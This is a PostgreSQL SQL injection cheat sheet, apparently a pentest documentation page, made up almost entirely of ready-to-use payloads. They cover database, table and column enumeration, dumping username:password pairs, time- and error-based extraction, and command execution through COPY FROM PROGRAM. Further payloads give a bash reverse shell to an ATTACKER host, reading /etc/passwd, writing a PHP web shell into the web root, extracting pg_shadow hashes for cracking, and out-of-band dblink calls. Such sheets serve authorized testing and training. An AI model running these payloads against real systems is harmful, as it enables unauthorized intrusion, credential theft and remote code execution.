> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Cheat Sheet — PostgreSQL

> PostgreSQL SQL injection cheat sheet: syntax, COPY RCE, file access, and enumeration payloads.

## Identification

```sql theme={"dark"}
SELECT version()
-- Comment: -- or /* */
-- String concat: 'a'||'b'
```

***

## Information Gathering

```sql theme={"dark"}
SELECT current_database()
SELECT current_user
SELECT session_user
SELECT current_schema()
SELECT inet_server_addr()
SELECT inet_server_port()
```

***

## Enumerate Databases

```sql theme={"dark"}
SELECT datname FROM pg_database
SELECT string_agg(datname,',') FROM pg_database
```

***

## Enumerate Tables

```sql theme={"dark"}
SELECT table_name FROM information_schema.tables WHERE table_schema='public'
SELECT string_agg(table_name,',') FROM information_schema.tables WHERE table_schema='public'
SELECT relname FROM pg_class WHERE relkind='r'
```

***

## Enumerate Columns

```sql theme={"dark"}
SELECT column_name FROM information_schema.columns WHERE table_name='users'
SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name='users'
```

***

## Dump Data

```sql theme={"dark"}
SELECT username||':'||password FROM users
SELECT string_agg(username||':'||password, ',') FROM users
```

***

## String Functions

| Function                 | Description      |
| ------------------------ | ---------------- |
| `\|\|`                   | Concatenate      |
| `string_agg(col,sep)`    | Aggregate concat |
| `SUBSTRING(str,pos,len)` | Substring        |
| `SUBSTR(str,pos,len)`    | Alias            |
| `LEFT(str,n)`            | Left N chars     |
| `RIGHT(str,n)`           | Right N chars    |
| `LENGTH(str)`            | String length    |
| `ASCII(char)`            | ASCII value      |
| `CHR(n)`                 | Char from ASCII  |
| `MD5(str)`               | MD5 hash         |
| `ENCODE(data,'base64')`  | Base64 encode    |
| `DECODE(data,'base64')`  | Base64 decode    |

***

## Conditional

```sql theme={"dark"}
CASE WHEN condition THEN true_val ELSE false_val END
SELECT (CASE WHEN 1=1 THEN 'true' ELSE 'false' END)
```

***

## Time Delay

```sql theme={"dark"}
SELECT pg_sleep(5)
SELECT CASE WHEN 1=1 THEN pg_sleep(5) ELSE pg_sleep(0) END
```

***

## Error-Based

```sql theme={"dark"}
CAST((QUERY) AS int)
-- Example:
' AND 1=CAST((SELECT current_database()) AS int)-- -
```

***

## Command Execution (RCE)

### COPY FROM PROGRAM (9.3+)

```sql theme={"dark"}
CREATE TABLE cmd(output text);
COPY cmd FROM PROGRAM 'id';
SELECT * FROM cmd;
```

### Reverse Shell

```sql theme={"dark"}
COPY cmd FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"';
```

***

## File Read

```sql theme={"dark"}
SELECT pg_read_file('/etc/passwd')
SELECT pg_read_file('/etc/passwd', 0, 1000)

-- Via COPY
CREATE TABLE tmp(data text);
COPY tmp FROM '/etc/passwd';
SELECT * FROM tmp;
```

***

## File Write

```sql theme={"dark"}
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php'
```

***

## Large Objects

```sql theme={"dark"}
SELECT lo_import('/etc/passwd')                    -- Import to LOB
SELECT lo_get(OID)                                 -- Read LOB content
SELECT lo_export(OID, '/tmp/output')               -- Export LOB to file
```

***

## Password Hashes

```sql theme={"dark"}
SELECT usename, passwd FROM pg_shadow
```

Crack: `hashcat -m 12`.

***

## Stacked Queries

Fully supported:

```sql theme={"dark"}
'; CREATE TABLE cmd(output text); COPY cmd FROM PROGRAM 'id';-- -
```

***

## Extensions

```sql theme={"dark"}
CREATE EXTENSION dblink;
SELECT dblink_connect('host=ATTACKER dbname=x user=x');    -- OOB
```

***

## Privilege Check

```sql theme={"dark"}
SELECT current_setting('is_superuser')
SELECT rolsuper FROM pg_roles WHERE rolname=current_user
```

***

## Sources

* [PortSwigger — SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
* [PentestMonkey — PostgreSQL SQL Injection Cheat Sheet](https://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* [PostgreSQL — String Functions](https://www.postgresql.org/docs/current/functions-string.html)
* [OWASP — SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
* [PayloadsAllTheThings — PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
